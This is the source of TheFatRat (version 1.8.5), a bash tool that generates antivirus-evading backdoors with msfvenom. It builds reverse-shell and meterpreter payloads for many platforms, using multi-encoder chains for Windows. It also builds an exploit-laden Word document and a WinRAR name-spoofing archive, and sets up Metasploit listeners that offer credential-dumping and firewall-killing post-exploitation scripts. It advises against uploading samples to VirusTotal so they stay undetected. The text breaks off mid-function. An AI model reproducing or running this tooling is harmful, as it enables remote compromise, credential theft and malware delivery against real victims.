fatrat

#!/usr/bin/env bash

#	THEFATRAT
#
#	Welcome and dont disclaimer
#	fatrat Author By Edo -maland-
#	Tested On , Backbox , kali Linux and Kali sana v.2
#	contact me in screetsec@gmail.com or screetsec@dracos-linux.org
#	DISTRO Penetration From Indonesia : https://dracos-linux.org/
#	Easy tool for generate backdoor with msfvenom ( part of metasploit framework )
#	and program compiles a C program with a meterpreter reverse_tcp payload In it that can then be executed on
#	a windows host Program to create a C program after it is compiled that will bypass most AV
#


# spinner for Metasploit Generator
spinlong ()
{
    bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ "
    barlength=${#bar}
    i=0
    while ((i < 100)); do
        n=$((i*barlength / 100))
        printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
        ((i += RANDOM%5+2))
        sleep 0.02
    done
}


# spinner for random seed generator
spinlong2 ()
{
    bar=" 01100111001001001110111001101010101010110101001010111001010101010101010"
    barlength=${#bar}
    i=0
    while ((i < 100)); do
        n=$((i*barlength / 100))
        printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
        ((i += RANDOM%5+2))
        sleep 0.02
    done
}


#for checking if your command is correct
gboor ()
{
cat << !
  Generate Backdoor
  +------------++-------------------------++-----------------------+
  | Name       ||  Descript   	          || Your Input
  +------------++-------------------------++-----------------------+
  | LHOST      ||  The Listen Addres      || $yourip
  | LPORT      ||  The Listen Ports       || $yourport
  | OUTPUTNAME ||  The Filename output    || $fira
  +------------++-------------------------++-----------------------+


!
}


#for checking if your command is correct when embed backdoor
gboor2 ()
{
cat << !
  Generate Backdoor
  +------------++-------------------------++-----------------------+
  | Name       ||  Descript   	          || Your Input
  +------------++-------------------------++-----------------------+
  | LHOST      ||  The Listen Addres      || $yourip
  | LPORT      ||  The Listen Ports       || $yourport
  | OUTPUTNAME ||  The Filename output    || Apk_embed_backdoor.apk
  +------------++-------------------------++-----------------------+


!
}


#WARNA KESUKAAN

cyan='\e[0;36m' 
green='\e[0;34m'
okegreen='\033[92m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
BlueF='\e[1;34m' #Biru
RESET="\033[00m" #normal

#SAMARAN TAMPAN

path=`pwd`
Versi=1.8.5
codename=Sparta
OS=`uname` #
distro="$(awk -F '=' '/^ID=/ {print $2}' /etc/os-release 2>&-)"
disrov="$(awk -F '=' '/^VERSION_ID=/ {print $2}' /etc/os-release 2>&-)"
SERVICE=service;
apkembed='tools/apkembed.rb' # exec script path
bundle='tools/signapk.jar' #tool included with the android platform source bundle
cert='tools/certificate.pem' #is a test key pairs ,create & use your own key pairs
key='tools/key.pk8'
pwned='python tools/pw_exec.py'
B='tools/prog.cs'
C='tools/dad.c'
apache='tools/apache.c'
paycom='output/payload.c'
pdfcom='output/pdf.c'
bcom='output/Program.cs'
pdfcom='output/pdf.c'
apachecom='output/apache_com.c'
out='output/ip.txt'
pump='tools/pump.py'
reverse1='temp/reverse1.c'
stag='temp/stag.c'
apkconfig=$path/config/apk.tmp
unzip=unzip
temp=$path/temp
file="config/config.path"


#Checking
[[ `id -u` -eq 0 ]] || { echo -e $red "Must be root to run script"; exit 1; } 
resize -s 33 84 > /dev/null
clear

#cek config

if [ -f "$file" ]
then
msfconsole=`sed -n 5p $file`	
msfvenom=`sed -n 6p $file`
backdoor=`sed -n 7p $file`
searchsploit=`sed -n 8p $file`
else
	echo -e $red"Configuration file does not exists , run setup.sh first for config ." 
exit 1
fi


#Jangan Nakal CTRL C MULU

trap ctrl_c INT
ctrl_c() {
clear
echo -e $red"[*] (Ctrl + C ) Detected, Trying To Exit ..."
sleep 1
echo ""
Stop
echo -e $red"[*] Stop all service , Wait  ..."
sleep 1
echo ""
echo -e $yellow"[*] Thank You For Using TheFatRat  =)."
echo ""
echo -e $yellow"[*] Check Dracos Linux LFS, Penetration OS From Indonesia  =P."
exit
}


#########################
#CHECK DEPENDICIES
#########################
echo -e $cyan"   ____ _               _    _                   "
echo "  / ___| |__   ___  ___| | _(_)_ __   __ _             "
echo " | |   | '_ \ / _ \/ __| |/ / | '_ \ / _\ |            "
echo " | |___| | | |  __/ (__|   <| | | | | (_| |  _   _   _ "
echo "  \____|_| |_|\___|\___|_|\_\_|_| |_|\__/ | (_) (_) (_)"
echo "                                     	|___/    "
echo -e $lightgreen'-- -- +=[(c) 2016-2017 | dracos-linux.org | Linuxsec.org | Hacker Indonesia '
echo -e $cyan'-- -- +=[ Author: Screetsec < Edo Maland >  ]=+ -- -- '
echo -e " "

if [ $(id -u) != "0" ]; then

      echo [!]::[Check Dependencies] ;
      sleep 2
      echo [✔]::[Check User]: $USER ; 
      echo [✔]::[Distro]: $distro ; 
      sleep 1
      echo [x]::[not root]: you need to be [root] to run this script.; 
      echo ""
   	  sleep 1
	  exit


else

   echo [!]::[Check Dependencies]: ;
   sleep 1
   echo [✔]::[Distro]: $distro ; 
   echo [✔]::[Check User]: $USER ; 


fi

  ping -c 1 google.com > /dev/null 2>&1
  if [ "$?" != 0 ]

then

    echo [✔]::[Internet Connection]: DONE!;
    echo [x]::[warning]: This Script Needs An Active Internet Connection;
    sleep 2

else

    echo [✔]::[Internet Connection]: connected!;
    sleep 2
fi

# check apache if exists
      which apache2 > /dev/null 2>&1
      if [ "$?" -eq "0" ]; then
      echo [✔]::[Apache2 Server $distro ]: installation found!; 
else

   echo [x]::[warning]:this script require apache2 to work ;
   echo ""
   echo [!]::Run setup.sh to install apache2 ;
   echo ""
   sleep 2
   exit 1
fi
sleep 2

#another apache2 locate
    if [ "$distro" = "Ubuntu" ]; then
      apache2="/var/www"
    elif [ "$distro" = "Kali" ]; then
      apache2="/var/www/html"
    elif [ "$distro" = "BackBox" ]; then
      apache2="/var/www/html"
    else
      apache2="/var/www/html"
    fi

# check msfconsole
      which $msfconsole > /dev/null 2>&1
      if [ "$?" -eq "0" ]; then
      echo [✔]::[Msfconsole]: installation found!;
else

   echo [x]::[warning]:this script require msfconsole installed to work ;
   echo ""
   echo [!]::Run setup.sh to install metasploit-framework ;
   sleep 3
exit 1
fi
sleep 2

# check if msfvenom exists
      which $msfvenom > /dev/null 2>&1
      if [ "$?" -eq "0" ]; then
      echo [✔]::[Msfvenom]: installation found!; 
else

   echo [x]::[warning]:this script require msfvenom installed to work ;
   echo ""
   echo [!]::Run setup.sh to install metasploit-framework ; 
   sleep 3
exit 1
fi
sleep 2

# check zenity if exists
      which zenity > /dev/null 2>&1
      if [ "$?" -eq "0" ]; then
      echo [✔]::[Zenity]: installation found!;

else

   echo [x]::[warning]:this script require zenity installed to work ;
   echo ""
   echo [!]::Run setup.sh to install zenity ;
   echo ""
   sleep 2
   exit 1
fi
sleep 2

# check mingw if exists
      which i586-mingw32msvc-gcc > /dev/null 2>&1
      if [ "$?" -eq "0" ]; then
      echo [✔]::[Mingw32]: installation found!;
      COMPILER="i586-mingw32msvc-gcc"
else
      which i686-w64-mingw32-gcc > /dev/null 2>&1
      if [ $? -eq 0 ]; then
      echo [✔]::[Mingw32]: installation found!;
      COMPILER="i686-w64-mingw32-gcc"
else
   echo [x]::[warning]:this script require mingw32 installed to work ;
   echo ""
   echo [!]::Run setup.sh to install ming32 ;
   sleep 2
   exit 1
 fi
fi
sleep 2


# check backdoor-factory if exists
      which $backdoor > /dev/null 2>&1
      if [ "$?" -eq "0" ]; then
      echo [✔]::[Backdoor-factory]: installation found!;

else

   echo [x]::[warning]:this script require backdoor-factory installed to work ;
   echo ""
   echo [!]::Run setup.sh to install backdoor-factory ;
   echo ""
   sleep 2
   exit 1
fi
sleep 2

# check ruby if exists
      which ruby > /dev/null 2>&1
      if [ "$?" -eq "0" ]; then
      echo [✔]::[Ruby]: installation found!;

else

   echo [x]::[warning]:this script require ruby installed to work ;
   echo ""
   echo [!]::Run setup.sh to install ruby ;
   echo ""
   sleep 2
   exit 1
fi
sleep 2

# check monodevelop if exists
      which monodevelop > /dev/null 2>&1
      which dmcs > /dev/null 2>&1
      if [ -d $find ]; then
      echo [✔]::[Monodevelop]: installation found!;

else

   echo [x]::[warning]:this script require monodevelop to work ;
   echo ""
   echo [!]::Run setup.sh to install monodevelop ;
   echo ""
   sleep 2
   exit 1
fi
sleep 2

# check xterm if exists
      which xterm > /dev/null 2>&1
      if [ -d $find ]; then
      echo [✔]::[Xterm]: installation found!;

else

   echo [x]::[warning]:this script require xterm to work ;
   echo ""
   echo [!]::Run setup.sh to install xterm ;
   echo ""
   sleep 2
   exit 1
fi

# check gnome-terminal if exists
      which gnome-terminal > /dev/null 2>&1
      if [ -d $find ]; then
      echo [✔]::[Gnome-terminal]: installation found!;

else

   echo [x]::[warning]:this script require gnome-terminal to work ;
   echo ""
   echo [!]::Run setup.sh to install gnome-terminal ;
   echo ""
   sleep 2
   exit 1
fi

# check apktool if exists
      which apktool > /dev/null 2>&1
      if [ -d $find ]; then
      echo [✔]::[Apktool]: installation found!;

else

   echo [x]::[warning]:this script require apktool to work ;
   echo ""
   echo [!]::Run setup.sh to install apktool ;
   echo ""
   sleep 2
   exit 1
fi

# check upx if exists
      which upx > /dev/null 2>&1
      if [ -d $find ]; then
      echo [✔]::[Upx]: installation found!;

else

   echo [x]::[warning]:this script require upx to work ;
   echo ""
   echo [!]::Run setup.sh to install upx ;
   echo ""
   sleep 2
   exit 1
fi

#WARNING !!!
clear
echo -e $red""
echo "                                                                  ";
echo "=================================================================="
echo "         WARNING !  WARNING ! WARNING ! WARNING ! WARNING ! "
echo "    YOU CAN UPLOAD OUTPUT/BACKDOOR FILE TO WWW.NODISTRIBUTE.COM   "
echo "=================================================================="
echo " ____  _____ _____ _____    _____ _____ __    _____ _____ ____    ";
echo "|    \|     |   | |_   _|  |  |  |  _  |  |  |     |  _  |    \   ";
echo "|  |  |  |  | | | | | |    |  |  |   __|  |__|  |  |     |  |  |  ";
echo "|____/|_____|_|___| |_|    |_____|__|  |_____|_____|__|__|____/   ";
echo "                         _____ _____                              ";
echo "                        |_   _|     |                             ";
echo "                          | | |  |  |                             ";
echo "                          |_| |_____|                             ";
echo " _____ _____ _____ _____ _____    _____ _____ _____ _____ __      ";
echo "|  |  |     | __  |  |  |   __|  |_   _|     |_   _|  _  |  |     ";
echo "|  |  |-   -|    -|  |  |__   |    | | |  |  | | | |     |  |__   ";
echo " \___/|_____|__|__|_____|_____|    |_| |_____| |_| |__|__|_____|  ";
echo "=================================================================="
echo "       PLEASE DON'T UPLOAD BACKDOOT TO WWW.VIRUSTOTAL.COM "
echo "    YOU CAN UPLOAD OUTPUT/BACKDOOR FILE TO WWW.NODISTRIBUTE.COM   "
echo "=================================================================="
echo ""
echo -n "Press any key to continue .............."
read warning

##############################
#CHECKING POSTGRESQL
#############################
if ps ax | grep -v grep | grep postgresql > /dev/null
then
	clear
	echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
    	echo -e $white":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
    	echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
        echo -e $lightgreen""
	echo "   ___________ _   _______________  ___  __  ___  ___  _______  _______";
	echo "  / __/ __/ _ \ | / /  _/ ___/ __/ / _ \/ / / / |/ / |/ /  _/ |/ / ___/";
	echo " _\ \/ _// , _/ |/ // // /__/ _/  / , _/ /_/ /    /    // //    / (_ / ";
	echo "/___/___/_/|_||___/___/\___/___/ /_/|_|\____/_/|_/_/|_/___/_/|_/\___/  ";
	echo "                                                                       ";
        echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
    	echo -e $white":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
   	echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
	sleep 2

else
    clear
    echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
    echo -e  $white"::::::::::::::::::::$white "Metasploit service is not running"$white ::::::::::::::::::"
    echo -e  $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
    echo ""
    echo -e $white		" 			             /)  "
    echo " 			            // "
    echo " 			            (( "
    echo " 			            // "
    echo " 			     .-.   //  .-. "
    echo " 			    /   \- ((=-/  \ "
    echo " 			    \       \     / "
    echo " 			     -( ___ ))__)-  "
    echo " 			     .-'   //  '-. "
    echo " 			    /     ((      \ "
    echo " 			    |       *     | "
    echo " 			    \             / "
    echo " 			     \   |_w_|   / "
    echo " 			     _)  \   /  (_ "
    echo "			jgs (((---'   '---))) "
    echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
    echo -e $white":::::::::::::::: Wait for starting a Service  Postgresql ::::::::::::::::"
    echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
fi

#Started Service postgresql & apache
if [ "$distro" = "Kali" ]; then
/etc/init.d/postgresql start > /dev/null 2>&1
/etc/init.d/metasploit start > /dev/null 2>&1
/etc/init.d/apache2 start > /dev/null 2>&1
else
/etc/init.d/postgresql start > /dev/null 2>&1
/etc/init.d/metasploit start > /dev/null 2>&1
/etc/init.d/apache2 start > /dev/null 2>&1
fi
read -p "Press [Enter] key to Continue..."
clear

function Stop() {
  #Stoped Service postgresql & apache
  if [ "$distro" = "Kali" ]; then
  /etc/init.d/postgresql stop > /dev/null 2>&1
  /etc/init.d/metasploit stop > /dev/null 2>&1
  /etc/init.d/apache2 stop > /dev/null 2>&1
  else
  /etc/init.d/metasploit stop > /dev/null 2>&1
  /etc/init.d/apache2 stop > /dev/null 2>&1
  /etc/init.d/postgresql stop > /dev/null 2>&1
  fi

}


function cmsfvenom() {
clear
echo -e $okegreen"  ===================================================================== "
echo -e " |  $cyan  Create Payload with msfvenom ( must install msfvenom )  $okegreen         | "
echo -e $okegreen"  ===================================================================== "
echo -e $red"  ___________ "
echo -e " |           |======[***   $yellow    ____                _             "
echo -e $red" | $yellow MSFVENOM $red \ 	    $yellow / ___|_ __ ___  ____| |_ ___  _ __ "
echo -e $red" |_____________\_______    $yellow  | |   | '__/ _ \/ _  | __/ _ \| '__|"
echo -e $red" |==[v1.2 >]===========\   $yellow  | |___| | |  __/ (_| | || (_) | |   "
echo -e $red" |______________________\  $yellow   \____|_|  \___|\____|\__\___/|_|    "
echo -e $yellow"  \(@)(@)(@)(@)(@)(@)(@)/ "
echo -e $red"  *********************  "
echo ""
echo -e $okegreen"  ===================================================================== "
echo -e " |                     $cyan        Created by $red Edo Maland  ( Screetsec )  $okegreen | "
echo -e $okegreen"  ===================================================================== "
echo ""
 			echo -e $okegreen "	[1]  LINUX >> FatRat.elf"
 			echo -e "	[2]  WINDOWS >> FatRat.exe"
			echo -e "        [3]  ANDROID >> FatRat.apk"
 			echo -e "	[4]  MAC >> FatRat.macho"
 			echo -e "	[5]  PHP >> FatRat.php"
 			echo -e "	[6]  ASP >> FatRat.asp"
 			echo -e "	[7]  JSP >> FatRat.jsp"
 			echo -e "	[8]  WAR >> FatRat.war"
 			echo -e "	[9]  Python >> FatRat.py "
			echo -e "	[10] Bash >> FatRat.sh"
			echo -e "	[11] Perl >> FatRat.pl"
			echo -e "	[12] doc >> Microsoft.doc "$yellow"( not macro attack )"
			echo -e $okegreen"	[13] rar >> bacdoor.rar "$yellow"( Winrar old version)"
			echo -e $okegreen"        [14] Back to Menu "
 			echo -e " "
 			echo -n -e $red'  \033[4mCreator$FATRAT:\033[0m>> '; tput sgr0 #insert your choice
 			read fatrat1
			if test $fatrat1 == '1'
				then
				echo ""
				spinlong
				echo ""
				read -p '  Set LHOST IP: ' yourip; read -p '  Set LPORT: ' yourport; read -p '  Please enter the base name for output files : ' fira
				payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "linux/ppc/shell_reverse_tcp" FALSE "linux/x86/shell_reverse_tcp" FALSE "linux/x86/meterpreter/reverse_tcp" FALSE "osx/armle/shell_reverse_tcp" FALSE "osx/ppc/shell_reverse_tcp" FALSE "bsd/x86/shell/reverse_tcp" FALSE "solaris/x86/shell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1
				spinlong
				echo ""
				echo ""
				gboor
				spinlong
				echo ""
				echo ""
         			$msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f elf > output/$fira.elf 
          			echo -e "Shell Saved To output Folder "
			elif test $fatrat1 == '2'
				then
				echo ""
				spinlong
				echo ""
				read -p '  Set LHOST IP: ' yourip; read -p '  Set LPORT: ' yourport; read -p '  Please enter the base name for output files : ' fira
				payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" FALSE "windows/powershell_bind_tcp" FALSE "windows/powershell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1
         			echo ""
				echo ""
				gboor
				spinlong
				echo ""
				echo ""
				$msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f raw -e x86/shikata_ga_nai -i 10 | $msfvenom -a x86 --platform windows -e x86/countdown -i 8  -f raw | $msfvenom -a x86 --platform windows -e x86/jmp_call_additive -i 1| $msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 1 | $msfvenom  -a x86 --platform windows -e x86/shikata_ga_nai -i 1 -f exe -o output/$fira.exe 
				echo -e "Shell Saved To output Folder "
			elif test $fatrat1 == '3'
				then
				echo ""
				spinlong
				echo ""
				read -p '  Set LHOST IP: ' yourip; read -p '  Set LPORT: ' yourport; read -p '  Please enter the base name for output files : ' fira
				payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/shell/reverse_tcp" --width 350 --height 300) > /dev/null 2>&1
				echo ""
				echo ""
				gboor
				spinlong
				echo ""
				echo ""
				$msfvenom -p android/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.apk 
				echo -e "Shell Saved To output Folder "
			elif test $fatrat1 == '4'
				then
				echo ""
				spinlong
				echo ""
				read -p '  Set LHOST IP: ' yourip; read -p '  Set LPORT: ' yourport; read -p '  Please enter the base name for output files : ' fira
				spinlong
				echo ""
				echo ""
				gboor
				spinlong
				echo ""
				echo ""
         			$msfvenom -p osx/x86/shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f macho > output/$fira.macho 
          			echo -e "Shell Saved To outputFolder "
			elif test $fatrat1 == '5'
				then
				echo ""
				spinlong
				echo ""
				read -p '  Set LHOST IP: ' yourip; read -p '  Set LPORT: ' yourport; read -p '  Please enter the base name for output files : ' fira
				spinlong
				echo ""
				echo ""
				gboor
				spinlong2
				echo ""
				echo ""
         			$msfvenom -p php/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.php 
          			echo -e "Shell Saved To output Folder "
			elif test $fatrat1 == '6'
				then
				echo ""
				spinlong
				echo ""
				read -p '  Set LHOST IP: ' yourip; read -p '  Set LPORT: ' yourport; read -p '  Please enter the base name for output files : ' fira
				spinlong
				echo ""
				echo ""
				gboor
				spinlong2
				echo ""
				echo ""
         			$msfvenom -p windows/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f asp > output/$fira.asp 
          			echo -e "Shell Saved To output Folder "
			elif test $fatrat1 == '7'
				then
				echo ""
				spinlong
				echo ""
				read -p '  Set LHOST IP: ' yourip; read -p '  Set LPORT: ' yourport; read -p '  Please enter the base name for output files : ' fira
				spinlong
				echo ""
				echo ""
				gboor
				spinlong2
				echo ""
				echo ""
         			$msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f raw > output/$fira.jsp 
          			echo -e "Shell Saved To output Folder "
			elif test $fatrat1 == '8'
				then
				echo ""
				spinlong
				echo ""
				read -p '  Set LHOST IP: ' yourip; read -p '  Set LPORT: ' yourport; read -p '  Please enter the base name for output files : ' fira
				spinlong
				echo ""
				echo ""
				gboor
				spinlong2
				echo ""
				echo ""
         			$msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f war > output/$fira.war 
          			echo -e "Shell Saved To output Folder "
			elif test $fatrat1 == '9'
				then
				echo ""
				spinlong
				echo ""
				read -p '  Set LHOST IP: ' yourip; read -p '  Set LPORT: ' yourport; read -p '  Please enter the base name for output files : ' fira
				spinlong
				echo ""
				echo ""
				gboor
				spinlong2
				echo ""
				echo ""
         			$msfvenom -p cmd/unix/reverse_python LHOST=$yourip LPORT=$yourport -f raw > output/$fira.py 
          			echo -e "Shell Saved To output Folder "
			elif test $fatrat1 == '10'
				then
				echo ""
				spinlong
				echo ""
				read -p '  Set LHOST IP: ' yourip; read -p '  Set LPORT: ' yourport; read -p '  Please enter the base name for output files : ' fira
				spinlong
				echo ""
				echo ""
				gboor
				spinlong2
				echo ""
				echo ""
         			$msfvenom -p cmd/unix/reverse_bash LHOST=$yourip LPORT=$yourport -f raw > output/$fira.sh 
          			echo -e "Shell Saved To output Folder "
			elif test $fatrat1 == '11'
				then
				echo ""
				spinlong
				echo ""
				read -p '  Set LHOST IP: ' yourip; read -p '  Set LPORT: ' yourport; read -p '  Please enter the base name for output files : ' fira
				spinlong
				echo ""
				echo ""
				gboor
				spinlong2
				echo ""
				echo ""
         			$msfvenom -p cmd/unix/reverse_perl LHOST=$yourip LPORT=$yourport -f raw > output/$fira.pl 
          			echo -e "Shell Saved To output Folder "

     			elif test $fatrat1 == '12'
       				then
         				echo
					echo -e $yellow"  Worked on Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] "
					echo -e $okegreen""
					echo -ne "  SET LHOST : ";tput sgr0
					read yourip
					echo ""
					echo -ne $okegreen " SET LPORT : ";tput sgr0
					read yourport
					echo ""
					echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0
					read fira
					echo ""
					payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1
					spinlong
					echo ""
					echo ""
					gboor
					spinlong
					echo ""
         				xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/ms12_027_mscomctl_bof; set payload $payloads ; set FILENAME $fira.doc; set lhost $yourip ; set lport $yourport; exploit; exit -y'"
         				echo ""
         				mv ~/.msf4/local/$fira.doc $path/output/$fira.doc 
         				echo -e $okegreen""
         				echo -e $yellow"  Backdoor doc Saved To output Folder "
         				echo ""
         				echo -ne $okegreen"  Press any key to continue ......... "
         				read continue

				elif test $fatrat1 == '13'
				  then
				   	echo
  					echo -e $yellow"  Worked on All Windows "
  					echo -e $okegreen""
  					echo -ne "  SET LHOST : ";tput sgr0
  					read yourip
  					echo ""
  					echo -ne $okegreen " SET LPORT : ";tput sgr0
  					read yourport
  					echo ""
  					echo -ne $okegreen " Please enter the base name for output files ex: test.zip / test.rar):" ;tput sgr0
  					read fira
            				echo ""
            				echo -ne $okegreen " Please enter spoofed file name to show ex : stuff.txt :" ;tput sgr0
            				read fira2
  					echo ""
  					payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1
  					spinlong
  					echo ""
  					echo ""
  					gboor
  					spinlong
  					echo ""
           				 xterm -T " TheFatRat < RAR BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/winrar_name_spoofing; set payload $payloads; set FILENAME $fira; set SPOOF $fira2; set lhost $yourip; set lport $yourport; exploit; exit -y'" 
           				 echo ""
           				 mv ~/.msf4/local/$fira $path/output/$fira 
           				 echo -e $okegreen""
           				 echo -e $yellow"  Backdoor Saved To output Folder "
           				 echo ""
           				 echo -ne $okegreen"  Press any key to continue ......... "
           				 read continue
			elif test $fatrat1 == '14'
				then
 				clear
				menu
	 	else
			echo -e "  Incorrect Number"
			fi
			echo ""
			echo -n -e $okegreen"Do you want exit? ( Yes / No ) : "
		read back
			if [ $back != 'n' ] && [ $back != 'N' ]
					then
					clear
					exit
			elif [ $back != 'y' ] && [ $back != 'Y' ]
					then
					cmsfvenom
			fi

}

function clisteners() {
clear
echo -e $okegreen"  ===================================================================== "
echo -e " |  $cyan  Create Listener with metasploit ( must install metasploit )  $okegreen    | "
echo -e $okegreen"  ===================================================================== "
echo -e $red"   .____    .__          __                                     ";
echo "   |    |   |__| _______/  |_  ____   ____   ___________  ______"
echo "   |    |   |  |/  ___/\   __\/ __ \ /    \_/ __ \_  __ \/  ___/"
echo "   |    |___|  |\___ \  |  | \  ___/|   |  \  ___/|  | \/\___ \ "
echo "   |_______ \__/____  > |__|  \___  >___|  /\___  >__|  /____  >"
echo "           \/       \/            \/     \/     \/           \/ "
echo -e $"                                                               >> v1.3 "
echo -e $okegreen"  ===================================================================== "
echo -e " |                     $cyan        Created by $red Edo Maland  ( Screetsec )  $okegreen | "
echo -e $okegreen"  ===================================================================== "
			echo ""
 			echo -e $okegreen"	[1]  Liseners for payload linux"
 			echo -e "	[2]  Liseners for payload Windows"
			echo -e "        [3]  Liseners for payload Mac"
 			echo -e "	[4]  Liseners for payload Android"
			echo -e "        [5]  Back to Menu "
 			echo -e " "
 			echo -n -e $red'  \033[4mListeners$fatrat:\033[0m>> '; tput sgr0 #insert your choice
 			read fatrat1

			if test $fatrat1 == '1' #LINUX
				then
				rm temp/*.rc > /dev/null 2>&1
				touch "temp/meterpreter_linux.rc"
           	 		echo use exploit/multi/handler > "temp/meterpreter_linux.rc"
				payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "linux/ppc/shell_reverse_tcp" FALSE "linux/x86/shell_reverse_tcp" FALSE "linux/x86/meterpreter/reverse_tcp" FALSE "osx/armle/shell_reverse_tcp" FALSE "osx/ppc/shell_reverse_tcp" FALSE "bsd/x86/shell/reverse_tcp" FALSE "solaris/x86/shell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1
           	 		echo set PAYLOAD $payload >> "temp/meterpreter_linux.rc"
				echo -e $okegreen ""
           	 		read -p '  Set LHOST IP: ' uservar
           	 		echo set LHOST $uservar >> "temp/meterpreter_linux.rc"
           	 		read -p '  Set LPORT: ' uservar
           	 		echo set LPORT $uservar >> "temp/meterpreter_linux.rc"
           	 		echo set ExitOnSession false >> "temp/meterpreter_linux.rc"
           	 		echo exploit -j  >> "temp/meterpreter_linux.rc"
           	 		xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_linux.rc" 
                                clear
			elif test $fatrat1 == '2' #Windows
				then
				rm temp/*.rc > /dev/null 2>&1
				touch "temp/meterpreter_windows.rc"
           	 		echo use exploit/multi/handler >> "temp/meterpreter_windows.rc"
				payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" FALSE "windows/powershell_bind_tcp" FALSE "windows/powershell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1
           	 		echo set PAYLOAD $payload >> "temp/meterpreter_windows.rc"
				pe=$(zenity --list --title "☣ TheFatRat ☣" --text "\npost-exploitation module to run" --radiolist --column "Pick" --column "Option" TRUE "sysinfo.rc" FALSE "fast_migrate.rc" FALSE "cred_dump.rc" FALSE "gather.rc" FALSE "auto_migrate+killfirewall.rc" --width 350 --height 240) > /dev/null 2>&1
				echo -e $okegreen ""
           	 		read -p '  Set LHOST IP: ' uservar
           	 		echo set LHOST $uservar >> "temp/meterpreter_windows.rc"
           	 		read -p '  Set LPORT: ' uservar
           	 		echo set LPORT $uservar >> "temp/meterpreter_windows.rc"
				echo set AutoRunScript multi_console_command -rc $path/postexploit/$pe >> "temp/meterpreter_windows.rc"
           	 		echo set ExitOnSession false >> "temp/meterpreter_windows.rc"
           	 		echo exploit -j  >> "temp/meterpreter_windows.rc"
           	 		xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_windows.rc" 
				clear
			elif test $fatrat1 == '3'  #Mac
				then
				rm temp/*.rc > /dev/null 2>&1
				touch "temp/meterpreter_mac.rc"
           	 		echo use exploit/multi/handler > "temp/meterpreter_mac.rc"
           	 		echo set PAYLOAD osx/x86/shell_reverse_tcp >> "temp/meterpreter_mac.rc"
				echo -e $okegreen ""
           	 		read -p '  Set LHOST IP: ' uservar
           	 		echo set LHOST $uservar >> "temp/meterpreter_mac.rc"
           	 		read -p '  Set LPORT: ' uservar
